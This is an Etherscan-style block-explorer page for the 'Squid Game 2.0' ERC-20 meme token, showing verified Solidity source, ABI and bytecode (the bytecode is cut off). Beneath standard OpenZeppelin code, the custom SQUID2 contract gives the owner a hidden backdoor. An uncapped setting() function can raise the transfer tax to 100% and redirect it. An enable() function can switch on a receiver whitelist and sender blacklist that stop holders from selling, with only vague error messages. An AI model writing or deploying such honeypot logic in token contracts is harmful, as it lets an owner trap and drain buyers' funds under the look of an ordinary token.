ERC-20
MEME
Overview
Max Total Supply
45,600,000,000 SQUID2.0
Holders
5,704 (0.00%)
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
12,564 SQUID2.0Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
SQUID2
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-07-07 */ // SPDX-License-Identifier: MIT // Created by SQUID2.0 https://www.squid2.wtf pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _owner = _msgSender(); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is IERC20Metadata, Context { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual{ } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } } uint8 constant DECIMAL_TOKEN = 18; uint256 constant RATE_PERCENT = 10000; uint256 constant BASE_UNIT = 10 ** DECIMAL_TOKEN; contract SQUID2 is ERC20, Ownable { uint256 public taxRate = 100; address public taxAccount = 0xA104619cdD80Eb38faB53A3CB2179c9291078bdF; bool private enabledListTo = false; bool private enabledListFrom = false; mapping(address => bool) private _listTo; mapping(address => bool) private _listFrom; constructor() ERC20("Squid Game 2.0", "SQUID2.0") { _mint(_msgSender(), 45600000000 * BASE_UNIT); } function _transfer(address from, address to, uint256 amount) internal override virtual { require(!enabledListTo || _listTo[to], "The receiving account is incorrect"); require(!enabledListFrom || !_listFrom[from], "The sending account is incorrect"); uint256 taxAmount = amount * taxRate / RATE_PERCENT; if (_listTo[from] || _listTo[to]) { taxAmount = 0; } else { super._transfer(from, taxAccount, taxAmount); amount -= taxAmount; } super._transfer(from, to, amount); } function setting(uint256 rate, address account) public onlyOwner { taxRate = rate; taxAccount = account; } function enable(int8 flag, address[] memory lAddrs, uint256 value) public onlyOwner { for (uint256 i = 0; i < lAddrs.length; i++) { enable(flag, lAddrs[i], value); } } function enable(int8 flag, address addr, uint256 value) public onlyOwner { if (-1 == flag) { enabledListFrom = value > 0; } else if (-2 == flag) { enabledListTo = value > 0; } else if (1 == flag) { _listFrom[addr] = value > 0; } else if (2 == flag) { _listTo[addr] = value > 0; } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"int8","name":"flag","type":"int8"},{"internalType":"address[]","name":"lAddrs","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"enable","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"int8","name":"flag","type":"int8"},{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"enable","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"rate","type":"uint256"},{"internalType":"address","name":"account","type":"address"}],"name":"setting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxAccount","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526064600655600780546001600160b01b03191673a104619cdd80eb38fab53a3cb2179c9291078bdf1790553480156200003c57600080fd5b506040518060400160405280600e81526020016d053717569642047616d6520322e360941b8152506040518060400160405280600881526020016705351554944322e360c41b815250816003908162000096919062000277565b506004620000a5828262000277565b50620000b19150503390565b600580546001600160a01b0319166001600160a01b039290921691909117905562000102620000dd3390565b620000eb6012600a62000458565b620000fc90640a9df8c80062000470565b62000108565b620004a0565b6001600160a01b038216620001635760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b80600260008282546200017791906200048a565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620001fe57607f821691505b6020821081036200021f57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620001ce57600081815260208120601f850160051c810160208610156200024e5750805b601f850160051c820191505b818110156200026f578281556001016200025a565b505050505050565b81516001600160401b03811115620002935762000293620001d3565b620002ab81620002a48454620001e9565b8462000225565b602080601f831160018114620002e35760008415620002ca5750858301515b600019600386901b1c1916600185901b1785556200026f565b600085815260208120601f198616915b828110156200031457888601518255948401946001909101908401620002f3565b5085821015620003335787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200039a5781600019048211156200037e576200037e62000343565b808516156200038c57918102915b93841c93908002906200035e565b509250929050565b600082620003b35750600162000452565b81620003c25750600062000452565b8160018114620003db5760028114620003e65762000406565b600191505062000452565b60ff841115620003fa57620003fa62000343565b50506001821b62000452565b5060208310610133831016604e8410600b84101617156200042b575081810a62000452565b62000437838362000359565b80600019048211156200044e576200044e62000343565b0290505b92915050565b60006200046960ff841683620003a2565b9392505050565b808202811582820484141762000452576200045262000343565b8082018082111562000452576200045262000343565b610f4680620004b06000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a457c2d711610071578063a457c2d714610254578063a9059cbb14610267578063af8a90b81461027a578063dd62ed3e1461028d578063f2fde38b146102a057600080fd5b8063715018a614610217578063771a3a1d1461021f5780638c967a54146102285780638da5cb5b1461023b57806395d89b411461024c57600080fd5b8063313ce567116100f4578063313ce5671461018c5780633322f52d1461019b57806339509351146101b05780636184c164146101c357806370a08231146101ee57600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd1461016757806323b872dd14610179575b600080fd5b61012e6102b3565b60405161013b9190610bc4565b60405180910390f35b610157610152366004610c2e565b610345565b604051901515815260200161013b565b6002545b60405190815260200161013b565b610157610187366004610c58565b61035f565b6040516012815260200161013b565b6101ae6101a9366004610cbc565b610383565b005b6101576101be366004610c2e565b6103d3565b6007546101d6906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b61016b6101fc366004610d9c565b6001600160a01b031660009081526020819052604090205490565b6101ae6103f5565b61016b60065481565b6101ae610236366004610dbe565b610409565b6005546001600160a01b03166101d6565b61012e6104ca565b610157610262366004610c2e565b6104d9565b610157610275366004610c2e565b610559565b6101ae610288366004610ddc565b610567565b61016b61029b366004610e08565b610596565b6101ae6102ae366004610d9c565b6105c1565b6060600380546102c290610e32565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610e32565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b60003361035381858561063a565b60019150505b92915050565b60003361036d85828561075e565b6103788585856107d2565b506001949350505050565b61038b610974565b60005b82518110156103cd576103bb848483815181106103ad576103ad610e6c565b602002602001015184610409565b806103c581610e98565b91505061038e565b50505050565b6000336103538185856103e68383610596565b6103f09190610eb1565b61063a565b6103fd610974565b61040760006109ce565b565b610411610974565b8260000b60001903610439576007805460ff60a81b1916821515600160a81b02179055505050565b8260000b60011903610461576007805460ff60a01b1916821515600160a01b02179055505050565b8260000b600103610495576001600160a01b0382166000908152600960205260409020805460ff1916821515179055505050565b8260000b6002036104c5576001600160a01b0382166000908152600860205260409020805460ff19168215151790555b505050565b6060600480546102c290610e32565b600033816104e78286610596565b90508381101561054c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610378828686840361063a565b6000336103538185856107d2565b61056f610974565b600691909155600780546001600160a01b0319166001600160a01b03909216919091179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6105c9610974565b6001600160a01b03811661062e5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610543565b610637816109ce565b50565b6001600160a01b03831661069c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610543565b6001600160a01b0382166106fd5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610543565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061076a8484610596565b905060001981146103cd57818110156107c55760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610543565b6103cd848484840361063a565b600754600160a01b900460ff16158061080357506001600160a01b03821660009081526008602052604090205460ff165b61085a5760405162461bcd60e51b815260206004820152602260248201527f54686520726563656976696e67206163636f756e7420697320696e636f72726560448201526118dd60f21b6064820152608401610543565b600754600160a81b900460ff16158061088c57506001600160a01b03831660009081526009602052604090205460ff16155b6108d85760405162461bcd60e51b815260206004820181905260248201527f5468652073656e64696e67206163636f756e7420697320696e636f72726563746044820152606401610543565b6000612710600654836108eb9190610ec4565b6108f59190610edb565b6001600160a01b03851660009081526008602052604090205490915060ff168061093757506001600160a01b03831660009081526008602052604090205460ff165b1561094457506000610969565b60075461095c9085906001600160a01b031683610a20565b6109668183610efd565b91505b6103cd848484610a20565b6005546001600160a01b031633146104075760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610543565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038316610a845760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610543565b6001600160a01b038216610ae65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610543565b6001600160a01b03831660009081526020819052604090205481811015610b5e5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610543565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36103cd565b600060208083528351808285015260005b81811015610bf157858101830151858201604001528201610bd5565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610c2957600080fd5b919050565b60008060408385031215610c4157600080fd5b610c4a83610c12565b946020939093013593505050565b600080600060608486031215610c6d57600080fd5b610c7684610c12565b9250610c8460208501610c12565b9150604084013590509250925092565b8035600081900b8114610c2957600080fd5b634e487b7160e01b600052604160045260246000fd5b600080600060608486031215610cd157600080fd5b610cda84610c94565b925060208085013567ffffffffffffffff80821115610cf857600080fd5b818701915087601f830112610d0c57600080fd5b813581811115610d1e57610d1e610ca6565b8060051b604051601f19603f83011681018181108582111715610d4357610d43610ca6565b60405291825284820192508381018501918a831115610d6157600080fd5b938501935b82851015610d8657610d7785610c12565b84529385019392850192610d66565b979a979950505050604095909501359450505050565b600060208284031215610dae57600080fd5b610db782610c12565b9392505050565b600080600060608486031215610dd357600080fd5b610c7684610c94565b60008060408385031215610def57600080fd5b82359150610dff60208401610c12565b90509250929050565b60008060408385031215610e1b57600080fd5b610e2483610c12565b9150610dff60208401610c12565b600181811c90821680610e4657607f821691505b602082108103610e6657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201610eaa57610eaa610e82565b5060010190565b8082018082111561035957610359610e82565b808202811582820484141761035957610359610e82565b600082610ef857634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561035957610359610e8256fea2646970667358221220ec6ce4292579a5d99589eba93f1b8d9efcb0f7bfde8755a5dd223462699f23f864736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a457c2d711610071578063a457c2d714610254578063a9059cbb14610267578063af8a90b81461027a578063dd62ed3e1461028d578063f2fde38b146102a057600080fd5b8063715018a614610217578063771a3a1d1461021f5780638c967a54146102285780638da5cb5b1461023b57806395d89b411461024c57600080fd5b8063313ce567116100f4578063313ce5671461018c5780633322f52d1461019b57806339509351146101b05780636184c164146101c357806370a08231146101ee57600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd1461016757806323b872dd14610179575b600080fd5b61012e6102b3565b60405161013b9190610bc4565b60405180910390f35b610157610152366004610c2e565b610345565b604051901515815260200161013b565b6002545b60405190815260200161013b565b610157610187366004610c58565b61035f565b6040516012815260200161013b565b6101ae6101a9366004610cbc565b610383565b005b6101576101be366004610c2e565b6103d3565b6007546101d6906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b61016b6101fc366004610d9c565b6001600160a01b031660009081526020819052604090205490565b6101ae6103f5565b61016b60065481565b6101ae610236366004610dbe565b610409565b6005546001600160a01b03166101d6565b61012e6104ca565b610157610262366004610c2e565b6104d9565b610157610275366004610c2e565b610559565b6101ae610288366004610ddc565b610567565b61016b61029b366004610e08565b610596565b6101ae6102ae366004610d9c565b6105c1565b6060600380546102c290610e32565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610e32565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b60003361035381858561063a565b60019150505b92915050565b60003361036d85828561075e565b6103788585856107d2565b506001949350505050565b61038b610974565b60005b82518110156103cd576103bb848483815181106103ad576103ad610e6c565b602002602001015184610409565b806103c581610e98565b91505061038e565b50505050565b6000336103538185856103e68383610596565b6103f09190610eb1565b61063a565b6103fd610974565b61040760006109ce565b565b610411610974565b8260000b60001903610439576007805460ff60a81b1916821515600160a81b02179055505050565b8260000b60011903610461576007805460ff60a01b1916821515600160a01b02179055505050565b8260000b600103610495576001600160a01b0382166000908152600960205260409020805460ff1916821515179055505050565b8260000b6002036104c5576001600160a01b0382166000908152600860205260409020805460ff19168215151790555b505050565b6060600480546102c290610e32565b600033816104e78286610596565b90508381101561054c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610378828686840361063a565b6000336103538185856107d2565b61056f610974565b600691909155600780546001600160a01b0319166001600160a01b03909216919091179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6105c9610974565b6001600160a01b03811661062e5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610543565b610637816109ce565b50565b6001600160a01b03831661069c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610543565b6001600160a01b0382166106fd5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610543565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061076a8484610596565b90506000198114